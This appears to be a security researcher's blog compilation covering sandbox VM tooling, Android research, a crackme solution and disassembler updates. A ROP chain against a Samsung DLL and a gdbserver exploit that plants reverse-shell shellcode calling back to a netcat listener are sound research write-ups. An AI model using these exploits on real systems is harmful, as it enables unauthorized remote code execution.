VMCloak 0.2: Windows 7 Support

VMCloak 0.2: Windows 7 Support

A couple of months ago I released the first version of
VMCloak, now it’s time for version 0.2. VMCloak is a tool for
automatically creating and configuring Virtual Machines for
Cuckoo Sandbox.

What’s new?

In this version of VMCloak we introduce the long-awaited Windows 7
support. This means VMCloak can now automatically create and configure
Windows 7 virtual machines for Cuckoo Sandbox.


Those who have used VMCloak in the past will see that creating Windows 7
virtual machines is now just as easy as creating Windows XP virtual machines.
Creating a Windows 7 virtual machine goes as follows:

# Install the latest vmcloak.
sudo pip install vmcloak --upgrade

# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7

# Ensure VirtualBox' hostonly adapter is up.

# Create a Win7 VM with the name win7_0.
# This will take about 15 to 20 minutes.
vmcloak -r --win7x64 win7vm

Besides a couple of internal changes, the only thing that changed for Windows
XP support is that you’ll now have to specify –winxp when creating a
Windows XP virtual machine, for example:

vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE

32-bit vs 64-bit

With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bit
and 64-bit Windows 7 installations. This mostly means that VMCloak will
install a 64-bit version of the .NET framework, the 64-bit version of the
Microsoft C Runtime, etc.
For this to work, however, you’ll have to inform VMCloak that the 64-bit
libraries should be used instead of the 32-bit ones. This can either be
achieved by passing the –x64 flag to vmcloak, or by combining the
–win7 and –x64 flags straight into the –win7x64 flag.

(The upcoming version of Cuckoo Sandbox, version 1.3, will support
64-bit analysis!)

VMCloak Birds

For those who want to deploy multiple virtual machines in a relatively short
time window while preserving as many resources as possible might like
VMCloak’s bird feature.
VirtualBox has immutable disks, disks that are created once and then never
changed; any changes on top of the immutable disk are then written to a new
VirtualBox disk. VMCloak uses this to create a bird image – a fully
installed and configured Windows installation. Creating a Virtual Machine
ready to be used by Cuckoo Sandbox out of this bird image then consists of a
couple of steps:

  • Create a new Virtual Machine.
  • Attach the immutable bird image.
  • Boot into Windows.
  • Configure a unique static IP address for this VM.
  • Run Cuckoo and take a snapshot of the VM.

Naturally all these steps are handled by vmcloak-clone.

Bird images are crucial when running a Cuckoo Sandbox instance with more
than a handful of VMs on one machine. Whereas creating a new VM with Windows 7
installed, such as a bird image, takes about 15 minutes of time and almost
10gb of diskspace, creating a clone of a bird image takes less than a minute
and less than 1gb per clone.
Note that you’ll still need the bird image, also after cloning! (Basically
instead of installing Windows 7 10 times for 10 VMs, the bird image allows you
to install Windows 7 once and then re-use this installation).

Following is a quick guide to setting up 10 VMs using a VMCloak bird. Running
these commands should take up to half an hour to finish – just enough to go
for lunch.

# Create the 64-bit Windows 7 Bird.
vmcloak -r --win7x64 --bird win7bird

# Create 10 VMs.
for i in {0..9}; do
    vmcloak-clone -r --bird win7bird win7_$i

What’s next?

As always further cloaking the VMs is on the roadmap. If anyone has tricks &
tips on known detection vectors that would be useful for VMCloak, please do
let me know. E.g., registry keys containing known values specific to
virtualization software, etc.

Other than that, I’ve been working hard on 64-bit analysis for Cuckoo Sandbox
for a while now, so there’s that ;) And a bunch of other new and upcoming
features in Cuckoo.


For any questions or suggestions, please feel free to
reach out to me.

VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox

VMCloak: Automated Virtual Machine Generation and Cloaking

Today I present you a tool that I’ve been working on for a while,
vmcloak. For those of you familiar with Cuckoo Sandbox
and setting it up you’ll surely be aware of the pain that is configuring
virtual machines

VMCloak 101

Somewhat complete documentation can be found at readthedocs.org,
however, a quick introduction of the related commands is of course the
easiest. (Do note that VMCloak has mostly been tested on Ubuntu/Debian, so
other distributions might not work, yet.

Basically you need a few things to get started:

  • vmcloak (sudo pip install vmcloak)
  • Windows XP Installer ISO file
  • Windows XP Serial Key (that works with your installer!)
  • genisoimage & VirtualBox (sudo apt-get install genisoimage virtualbox)
  • Two directories for VirtualBox files.

First we have to mount the windows installer ISO file:

sudo mkdir -p /mnt/winxp
sudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp

Now we have to start vboxnet0 if it has not already been started:

# If this returns nothing, then vboxnet0 hasn't
# been started.
VBoxManage list hostonlyifs

# Create vboxnet0 and assign the correct IP address.
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip

And then two directories are required – a directory where VirtualBox’ snapshot
files will be stored, and a directory where the VirtualBox harddisk files and
installer ISO files will be stored. Note that you might want to place the
snapshot files in a tmpfs container to ensure VMs load pretty much

mkdir ~/vms/ ~/vm-data/

Having setup the mount directory, the hostonly interface, and the VirtualBox
directories we’re now good to go with regards to creating our first VM with
VMCloak. It is recommended to use the recommended settings by providing
the -r switch. By default the hostonly IP address will be set to, however, if you intend to create multiple VMs then you’ll have
to give each VM a unique IP address (i.e.,,,
etc.) In order to automatically register the newly created VM with Cuckoo
you’ll have to set the cuckoo directory so we’ll do this as well.

We’re now going to make a VM with the name cuckoo1 and the IP address

vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \
    --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \
    --hostonly-ip --cuckoo ~/cuckoo/ \

The -d switch causes vmcloak to spit out debugging messages which may be
helpful in some cases. This command will take up to 30 minutes to finish -
on the machines I’ve tested it’s usually less than or roughly 10 minutes.

So.. get yourself something to drink, wait for a bit, and you should have a
VM ready to be used by Cuckoo.

Allowing VMs full internet access

It is possible to give VMs full internet access, even after
creating them, without modifying the VMs themselves. If your network
configuration is “regular” (i.e., a working internet connection at either
eth0 or wlan0) then you’ll only have to run one command:

sudo vmcloak-iptables


Of course this is a never-ending project and it’s still actively being
developed ;) Things on the TODO list include, but are not limited to:

  • Windows 7 support
  • Further VM cloaking (making the VM as stealth as possible)
  • VMWare Workstation support
  • Support for installing Adobe / Microsoft Office / etc in the VM
  • Loads more..


Of course there’s an official website and naturally the source code
can be found on github.


Further credits go to Thorsten Sick of Avira and a special thanks to
Avira and the iTES Project for supporting the development of
this tool.

So much for today! Hope the tool will be useful for people and if there are
any questions don’t hesitate to email me or so.

ps: Please don’t tell me about using vagrant or similar instead of
something custom built unless you’ve actually used it together with Cuckoo :P

Mona 101: a Global Samsung DLL

Mona 101: a Global Samsung DLL

This blogpost will be just another 101 for mona.py. There’s already a
good introduction to / full documentation of mona here, including
setting it up and running it for the first time. (Which is surprisingly easy,
at least with Immunity Debugger – I haven’t tested mona with WinDBG.)

Our target

Well, it turns out that a dll called WinCRT.dll, developed by Samsung and
distributed by default on at least a set of Samsung laptops, is
being loaded in every process that imports user32.dll on my system.. Yay!
Needless to say it doesn’t have ASLR enabled, nor does it rebase by default.
If you haven’t guessed its base address by now, then I’ll give you a hint;
0×10000000. A copy of the DLL can be found here – naturally I’m not
responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is:
C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll

Generate some ROP

After running any program which imports user32, such as the following
MessageBox() program, we attach Immunity Debugger to it.

#include <windows.h>

int main()
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);

We run the following command and get our ROP chain after roughly 10 seconds:

!mona rop -m wincrt -rva

As documented in the tutorials that were linked earlier in this blogpost, the
-m switch specifies the module to search, and -rva gives a dump with
relative addresses to the base address. (In case you need an infoleak to
obtain the base address of your target module, rather than having a DLL that’s
being loaded on a static address.)

The ROP chain returned may look like the following, including some comments
about what the registers should look like at the point that VirtualAlloc is

Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()

def create_rop_chain(base_wincrt):
    # rop chain generated with mona.py
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN [WinCRT.dll]
        0x00000000,                # &  []
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN [WinCRT.dll]
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN [WinCRT.dll]
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN [WinCRT.dll]
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN [WinCRT.dll]
        base_wincrt + 0x0000f204,  # RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN [WinCRT.dll]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)

Fixing the ROP chain

Unfortunately mona makes some small mistakes, but that’s why it gives great
feedback in the form of rop.txt and rop_suggestions.txt.

Now if you look closely at the generated ROP chain, while comparing them to
the notes about the required states of the registers for VirtualAlloc, then
you’ll notice that some gadgets have to be shuffled around, and some are not
correct yet.

Let’s analyze each register top-to-bottom from the provided register list in
order to see if they’re all set correctly. First we start with eax.

Eax is set to 0×90909090 at the end. However, it also sets ebp to an invalid
value – register dependencies is something that mona doesn’t handle very
well yet, unfortunately. Anyway, it’s easier to replace this gadget than to
shuffle it around. I ended up replacing it by a “pop ecx ; retn” and
“mov eax, ecx ; retn” gadget, and moving it to an earlier place in the ROP
chain where ecx has
not yet been assigned its final value. Ecx itself is already correct, it’ll be
set to 0×40 using the ‘original’ “pop ecx ; retn” gadget.

Edx has to become 0×1000, for which mona has decided to use ebx as
intermediate register. We can remove the first gadget that sets ebx, as its
value is overwritten right away when executing the next gadget. (Which sets
ebx as well.)

Now mona handles esp for us, so we don’t have to do anything there. The next
register, ebp, however, does need some extra work. The description tells us
it needs to point to a “jmp esp” gadget, but because there’s no such gadget in
our DLL mona sort of failed silently. (The comment doesn’t show an error
message, but instead shows something that doesn’t make much sense.)

Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,
we have to play around with mona some more.. We run the following command
which is, again, documented here, and find the following gadget.

!mona findwild -s "push esp#*#retn" -m wincrt

0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]

Finishing up

So yeah, that’ll do for us :) Patch the 0×00000000 value with
“base_wincrt + 0×00009558″ and ebp is good to go. Finally, esi and edi
have been handled correctly by mona. (Note that we don’t have to worry about
the value of eax in our custom “jmp esp” gadget, as this is executed right
after the call to VirtualAlloc, and literally jumps to our shellcode.)

Having fixed the ROP chain, our final ROP chain including some MessageBox()
shellcode, wrapped into a C file looks like the following. (Woah,
somebody added C dumping support to mona yesterday!) In case you’re interested
in the binary, to be ran when the DLL is loaded into memory, it can be found


This was the first time I tried mona and I’m genuinely happy about it. Very
easy to use and it did the job for me :) Ah yeah, so anyone with this
particular Samsung software on his computer.. how do I even.. I guess it’s
just “another one of those”.

Turning arbitrary GDBserver sessions into RCE

Turning an arbitrary GDBserver sessions into RCE

Today we’ll see how we can turn an arbitrary GDBserver remote debugging
session into remote code execution. First of all, let’s assume gdbserver is
ran using the following command. We will also assume that the target
architecture is Linux/x86, but you can port the technique to other
architectures as needed.

$ gdbserver --remote-debug ./some_unknown_binary

What happens is that gdbserver will serve as many remote debugging sessions as
possible while it’s running. That is, we can have as many remote debugging
sessions as we like, until the gdbserver is killed (but only one at a time.)
This makes sense, because if we are debugging a target, then we don’t want to
restart gdbserver every time we hit “run” in gdb.

Let’s assume one were to run gdbserver in a screen, to prevent accidental
connection resets resulting in losing the gdbserver session (assuming we’re
ssh’ing into a remote server.) Exactly this happened to me – I recently found
out that there were still two (of my) gdbserver’s running in a screen from
when we were playing a CTF, almost two months ago.

Now anyone with the ip address and port number can attach to your gdbserver by
doing the following.

$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
[Inferior 1 (process 42) exited normally]

In order not to make the RCE not too easy, we’re going to assume that we don’t
have any symbols of the remote binaries, and that all addresses are ASLR’d. In
other words, educational guessing of “main” is useless, and we won’t be able
to do arbitrary function calls during debugging such as the following.

(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.

However, if we enter a breakpoint at an invalid address and run the debuggee,
we get an error right before executing the very first instruction of the
process. This looks roughly like the following :)

(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.
(gdb) info reg eip
eip            0xf7fe0850       0xf7fe0850

At this point the debuggee has been executed, and we’re able to inspect and
modify its state. We continue by removing our earlier breakpoint. Now it’s
time for the fun part.

Reverse Shell Shellcode

After a bit of googling, I stumbled upon the following shellcode. This
shellcode connects to an ip address and port of your choosing, and executes
/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat
listening on the remote ip address and port, then it’ll get a connection
request upon execution of the shellcode, and we can use it to run arbitrary
shell commands on the shellcodes machine, as if we had shell access. After an
initial test, this shellcode seemed to work on my x86_64 machine running a
32-bit application. However, there’s a small problem with this shellcode. If
we look closely at the shellcode, we notice the following.

804807b:   31 db        xor    ebx,ebx
804807d:   b3 02        mov    bl,0x2
804808a:   fe c3        inc    bl
8048098:   b1 03        mov    cl,0x3
804809a <dupfd>:
804809a:   fe c9        dec    cl
804809c:   b0 3f        mov    al,0x3f
804809e:   cd 80        int    0x80      ; system call
80480a0:   75 f8        jne    804809a

Investigating this system call further, we see that this is the dup2
system call
. However, the ebx register, or old_fd, seems to be
constant here – namely three. (I figured this out while brushing my teeth..)
This is the default fd if you open your first file descriptor in a program,
which is something we cannot assume, and is definitely not the case when
running the debuggee under gdbserver. (E.g., this shellcode fails if you open
a file or socket before running it, because the fd of the socket allocated by
our shellcode will be four for example, instead of three.)

If we look further, we see that the esi register contains the fd number
returned from the socket system call. (Actually, this is the socketcall
system call with SOCKOP_socket as operation, but that’s a minor detail
specific to Linux/x86.)

8048075:   cd 80        int    0x80      ; socket()
8048077:   89 c6        mov    esi,eax   ; esi = fd
804808e:   6a 10        push   0x10      ; sizeof(sockaddr_in)
8048090:   51           push   ecx       ; sockaddr_in *
8048091:   56           push   esi       ; fd
8048092:   89 e1        mov    ecx,esp
8048094:   cd 80        int    0x80      ; connect()

Long story short, we want to preserve esi before the connect system call,
and store it into ebx after the system call. Thus ebx will contain the fd of
our socket, and the system calls to dup2 will duplicate the correct fd into
stdin, stdout, and stderr. The following snippet shows the updates shellcode.
This is the shellcode that we’re going to use.

8048092:   89 e1        mov    ecx,esp
+                       push   esi       ; push fd
8048094:   cd 80        int    0x80      ; connect()
+                       pop    ebx       ; pop fd into ebx
8048096:   31 c9        xor    ecx,ecx
8048098:   b1 03        mov    cl,0x3

Running the Shellcode

All we have left to do is to patch the correct ip address and port into the
shellcode, namely that of our listening netcat instance (e.g., running
“nc -vvv -l 9001″ on your favourite linux box), overwriting eip with the
shellcode, and finally, running it.

For my exploit I’m using gdb’s Python bindings, as initially I had another
technique in mind, which required a bit more scripting. Following is the
final part of the code which generates the shellcode, overwrites it onto eip,
and executes it. We have two continue statements at the end, as the
shellcode will execv into /bin/sh, after which we’ll get an error that
gdbserver can’t read the memory of eip anymore, so we have to instruct
gdbserver to continue past that error.

def reverse_shell((ip, port)):
    """Modified x86 reverse shell"""
    ip, port = socket.inet_aton(ip), struct.pack('>H', port)
    sc = \
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \
    return sc.decode('hex').replace('\xff'*2, port).replace('\x00'*4, ip)

for idx, ch in enumerate(reverse_shell(netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ord(ch)))


Final Exploit

The final exploit code can be found here.

Execution of the code may look like the following. We’ll need three shells.
(Optionally on different servers – do as you like.)

Shell 1

$ gdbserver --remote-debug ./some_unknown_binary

Shell 2

$ nc -vvv -l 31338

Shell 3

$ vim gdbservrce.py   # Patch the ip addresses
$ gdb -x gdbservrce.py

Enjoy Shell!

Now if we go back to Shell #2, we’ll see the following, and can run arbitrary
shell commands.

skier@box:~$ nc -vvv -l 31338
Connection from port 31338 [tcp/*] accepted
uid=1010(skier) gid=1011(skier) groups=1011(skier)


This is a funny technique which basically tells you not to have gdbserver’s
running around :)

Dalvik Research

Dalvik Research

Over the past couple of months I’ve been doing some research with regards to
the Dalvik Virtual Machine, which is Android’s Java Virtual Machine
implementation. Long story short, most Android applications are written in
Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a
Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and
various applications – with a focus on their Obfuscation techniques (which
makes analysis harder.) This research was presented on a couple of

Back in June I already posted my slides for my AthCon
talk, which focussed on Deobfuscation. Then a couple of weeks ago,
I did a similar talk together with Rodrigo Chiossi at
H2HC, featuring new and updated content, with a bit more focus on some
of the techniques involved in creating new Dex files.

Finally I did a talk yesterday at Hack.lu, focussing on the
Dalvik Virtual Machine itself. In this talk I presented about an
“undocumented feature” which I found in the way Android verifies Dex files,
allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not
allowed – all code must normally be hardcoded and will be verified upon
installation.) Following are the slides and the
Proof of Concept DvmEscape application.

As explained during the presentation, when running this application on your
phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by
clicking on the “Run Dalvik” button. On the 30th slide of the presentation one
can find two examples of valid Dalvik Bytecode, which, when ran, will return
with a fancy number. Unfortunately the dalvik.py disassembler mentioned in the
slides is currently not open source, but for some more documentation on the
Dalvik Bytecode there’s always the Dalvik Bytecode reference.

Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation
you’ll have to do a couple of things:

  • Install CalcExe.apk on the device
  • Get the adb_type.py script, which “types” a string into
    the emulator
  • Finally, type payload.txt to the DvmEscape application, with
    the following command.

$ python adb_type.py $(cat payload.txt)

Note that typing the bytecode in to the emulator (or phone?!) takes roughly a
minute. (No, there appears to be no support for using the clipboard with the
emulator.) After that, just click on the button and calc should pop :)

For more information or questions, feel free to reach me at my new email
address; mail.

Dirkjan Email Feed

Dirkjan Strip Mailing List

This blogpost is mainly for Dutch (speaking) people (although I’ll
still keep the blogpost in English.) As I’m sure you’re all well-aware,
Dirkjan is an awesome Dutch comic.

A couple of weeks ago I stumbled upon the weekly feed from Veronica.
Naturally, not wanting to check the website every week, I came up with a very
simple Dirkjan Feed in the shape of a Mailing List. Of course this is not
so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way to
keep up-to-date with two Dirkjans a week!


Having said that, one can subscribe here simply by filling out
the email address. Other information is optional and not very interesting.
(Yes, the website is a bit ugly – it’s the default mailing list manager.)

By subscribing you agree to being awesome (given you’re interested in reading
Dirkjan) and the legal disclaimer on the bottom of this blogpost.


As I’ve only just set up the mailing list, I do not know exactly when new
comics will arrive, but it looks like it will be every Tuesday. Please, when
, do not panic – the comics will come eventually! (Just

Legal stuff

I’m not affiliated with Veronica in any way. Any damage done through this
Dirkjan Email Feed is at your own responsibility. I do not intend
to damage Veronica in any way.

That’s all, and have fun reading Dirkjan. Dirkjan is awesome :)

Darm Update – More ARMv7, More Thumb

Darm Updates – More ARMv7, More Thumb

Darm is an ARMv7 disassembler in C. This blogpost is just
a small update about the new stuff in darm from over the past couple of
months, as there were some delays due to conferences and other stuff :)

Thumb support

Most notably, recently Darm has gained support for the Thumb instruction
set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7
and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,
but Thumb is a small subset of the most used ARMv7 instructions and are only
16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless to
say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the
equivalent function for disassembling ARMv7 instructions. Furthermore, the two
instruction set modes share the same data structure, darm_t, hence it is
easily possible to write generic analysis routines without having to worry
whether you’re analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (Including the Thumb2
function, for more information on that, read further.)

typedef struct _darm_t {
} darm_t;

// disassemble an armv7 instruction
int darm_armv7_disasm(darm_t *d, uint32_t w);

// disassemble a thumb instruction
int darm_thumb_disasm(darm_t *d, uint16_t w);

// disassemble a thumb2 instruction
int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);

ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing
too spectacular, but it’s still improving as I find bugs and stumble upon new

Coming up: Thumb2 support

Currently I’m working on getting support for the Thumb2 instruction set as
well. As the Thumb instruction set is fairly limited with regards to the
instruction that it can handle, as it’s only 16 bits in size, rather than 32
bits, there’s also the Thumb2 extension. Thumb2 features almost all (except
for maybe a handful of instructions) of the instructions which are also
available in the ARMv7 instruction set, hence allowing the optimized Thumb
instructions to be mixed with Thumb2 instructions, which are, as ARMv7, 32
bits in size.

Having said that, if there are requests for instructions which you’d like to
see sooner rather than later, please do contact me. At first I aim to support,
let’s say, 90% of the binaries while keeping the amount of implemented
instructions to a “minimum.” That is, I’ll focus on the most used Thumb2
instructions at first, and go for the complete instruction set later.

Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When executing ARM instructions, the instruction will be executed as ARMv7
instruction whenever the address is 4-byte aligned, and executed as either
Thumb or Thumb2 instruction, depending on its encoding, when the lowest
significant bit is set. That is, when the address is not 4-byte aligned, but
instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer),
then the instruction is decoded as being either Thumb or Thumb2.

The instruction is either decoded as Thumb or Thumb2 depending on a couple of
the most significant bits. When decoded as Thumb, one 16 bit word is fetched
and executed. When decoded as Thumb2, a second 16 bit word is fetched and the
instruction is decoded as if it were a 32 bit word.

At the following lines of code we can see the comparison of the
upper 5 bits of the first 16 bit word. When the upper five bits equal either
b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a
Thumb2 instruction. Otherwise it’s a Thumb instruction.

Also note that at the moment there are two seperate functions to disassemble
Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be a
nice wrapper around them :)


For questions etc, you know where to find me.

Solving ZCrackme#2: A Custom Emulator Approach

Solving ZCrackme#2: A Custom Emulator Approach

Due to my non-existent experience with using gdb under ARMv7, I decided to
solve this challenge (the ZCrackme #2 Challenge) using a minimal
ARMv7 emulator
based on my ARMv7 disassembler. (The original
challenge can be found here.)

ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a similar structure as the
first ZCrackme challenge (not sure if there’s a blogpost about this one
though.) Basically the ELF header is messed up, sections are missing, and the
Entry Point points to a page filled with zeroes.


Upon further inspection, using readelf -a zcrackme2, we find that the binary
features the so-called preinit-array, init-array, and fini-array dynamic
sections. These dynamic sections in fact represent a table of function
addresses which are being called right before calling the real Entry
Point (in the case of preinit-array and init-array) and called after
calling the real Entry Point (in the case of fini-array.)

Looking up the various virtual offsets using IDA Pro, we find that only the
init-array points to a real address, loc_B0D8. (The other table arrays,
preinit-array and fini-array, are filled with zeroes and -1′s, which are
nops – as in, these are not really called.)

We conclude that the actual entry point, or, the code that will be executed
first, is located at this (loc_B0D8) address. From analyzing this routine
in IDA Pro, we see
some sort of decryption loop which overwrites some memory. Finally, after
executing said decryption loop, an interesting system call is performed,
namely #0xf0002. We find that this system call represents


Basically, before the decrypted code can be executed, the code cache first has
to be cleared for the particular address range in order to make sure that,
when it is being executed, the new code will be executed, rather than any
remaining code in the cache.

Similar tricks to this (decrypting code and clearing the cache) are performed
a total of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in
the decrypted code. Which, in turn, does some more rounds of decryption.

Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five
times. One of these “decryptions” in fact zeroes the first 100 bytes of the
ELF header. As our goal is to dump a decrypted version of the crackme binary,
this ELF header corruption does not help us (as IDA Pro wouldn’t understand
the binary anymore.)

Reconstructing a Decrypted Binary

As decryption is being followed by clearing the cache each time, we dump a new
binary during each time the cache is cleared. We do this by applying the
changes to a copy of the original binary. That is, read the decrypted data
from emulator memory, and overwriting it to our original binaries buffer. We
do this for each decryption, except for the one iteration where the ELF header
is zeroed out. (Note: the __clear_cache system call takes the starting
address as first parameter and the end address as second parameter, hence it
is trivial for us to find out which chunks of memory have been decrypted.)

Scripting the Emulator

The following script, although a bit messy, represents the code to dump
the binary a couple of times, which results in the final binary we’re
interested in. The unpacked binary can be found here. (Note that this
unpacked binary may be inaccurate, with regards to global variables etc that
have been updated during runtime but are not reflected in this version of the

Having successfully dumped the unpacked binary, it is now time for some static
analysis on this binary. Do note that our emulator should run fine on
Windows and Linux (with a 32bit Python installed, that is.)

The actual Crackme

Looking through the dumped binary, we find ourselves looking at sub_87B4,
which is the function where the real stuff is happening (argc/argv parsing,
that is.)

There are a couple of odd text messages which will be printed whenever
incorrect information is entered on the commandline. Finally, we find some
interesting function calls, of which one to sub_8638, which seems to decrypt
the string buffer that can be found at byte_9C35, and another function which
does a custom strcmp() against the argument on the commandline.

The string at byte_9C35 is decrypted by xor’ing with 0x0d (decrypted to a
buffer on the stack by sub_8638), resulting in the
string ZenCracking. That said, we’ve solved the challenge..


In case somebody has a working gdb for ARMv7 setup, this challenge is probably
pretty easy (i.e., step through the various decryption iterations, and try to
find the custom strcmp.) However, I had fun implementing the simple ARMv7
emulator, which is in fact pretty tricky, with all the conditional stuff going

Now a harder crackme? Let’s hope the next one does not involve xor
“encryption” :p Zimperium’s response was, however, that having gotten to the
xor-decryption part already shows enough knowledge and understanding of ARMv7,
to which I agree :)

Automated Deobfuscation of Android Applications

Automated Deobfuscation of Android Applications

During AthCon 2013 last week I talked about Automated Deobfuscation
of Android Applications and Malware
. In particular, this presentation
focussed on using automated deobfuscation tools in order to speed up the
analysis of 3rd party applications which have been obfuscated.
Click here for the slides.
The cyanide and obad.a samples discussed in the presentation can be found
here (password infected.)

The Dexguard Scripts

At the moment the dexguard scripts are focussed at deobfuscating all
obfuscated strings and reconstructing a new dex file. As you will quickly see
when analyzing the _undexguard.dex files (explained further in the samples
section), this is far from complete deobfuscation. However, it gives a good
start at analyzing the sample more quickly. (And it’s work in progress.)

The tools?

As for now I have decided to, unfortunately, keep the code private. I’m
considering setting up a deobfuscation website later, where one can upload
a sample and download the deobfuscated sample a few seconds later.

Please do let me know if you (or your company) is interested in such
You know where to contact me.

The Samples

A little explanation on the given samples.

Cyanide Sample

Cyanide.dex is a root exploit by Justin Case.

  • cyanide_original.dex is the original Cyanide binary
  • cyanide_dexguard.dex is a Dexguarded version of cyanide_original.dex
  • Running unchina.py on cyanide_dexguard.dex gives us cyanide_unchina.dex
  • Running our dexguard scripts on cyanide_unchina.dex gives us cyanide_undexguard.dex

Note: the dexguard version used for this sample is the one-to-last, however,
our framework has support for the latest version as well.

Obad.a Sample

Obad.a is a Most Sophisticated Android Trojan.

  • obad_original.dex is the original obad.a binary
  • We get obad_undexguard.dex after running our dexguard scripts on obad_original.dex

Note: obad_undexguard.dex will not run on an emulator or a real device due
to the way it’s built. (The cyanide_undexguard.dex, however, should work.)
Even though it doesn’t run, JEB loads the undexguarded file just fine,
so it’s mostly useful for analysis.

Pintool and Z3 Introduction

I’ve posted an introduction on Pintool and one on Z3 on the blog of our CTF Team, De Eindbazen.

And, yes, these actually provided us with results!

Pintool Introduction: http://eindbazen.net/2013/04/pctf-2013-hypercomputer-1-bin-100/

Z3 Introduction: http://eindbazen.net/2013/04/pctf-2013-cone-binary-250-2/